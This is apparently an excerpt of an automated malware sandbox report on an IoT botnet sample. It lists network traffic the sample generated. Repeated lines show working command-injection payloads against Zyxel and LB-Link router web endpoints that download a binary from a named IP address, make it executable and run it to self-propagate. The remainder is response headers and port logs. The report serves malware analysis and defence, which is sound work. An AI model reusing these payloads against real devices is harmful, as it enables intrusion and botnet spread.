            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 Jan 2024 16:13:30 GMTX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 202Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /goform/set_LimitClient_cfg</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundconnection: keep-alivecontent-length: 9content-security-policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; script-src 'self' 'unsafe-inline'; object-src 'none'; form-action 'self'; frame-ancestors 'self';content-type: text/plain; charset=UTF-8cross-origin-opener-policy: same-origindate: Sun, 28 Jan 2024 09:13:55 GMTreferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockData Raw: 4e 6f 74 20 46 6f 75 6e 64 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 38 20 4a 61 6e 20 32 30 32 34 20 30 39 3a 31 33 3a 35 35 20 47 4d 54 0d 0a 0d 0a Data Ascii: Not FoundHTTP/1.1 400 Bad Requestconnection: closecontent-length: 0date: Sun, 28 Jan 2024 09:13:55 GMT
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: skyljnee.arm5-20240128-0910.elfString found in binary or memory: http://103.245.236.146/skyljnee.mips;$
            Source: skyljnee.arm5-20240128-0910.elfString found in binary or memory: http://103.245.236.146/skyljnee.mpsl;
            Source: skyljnee.arm5-20240128-0910.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: skyljnee.arm5-20240128-0910.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
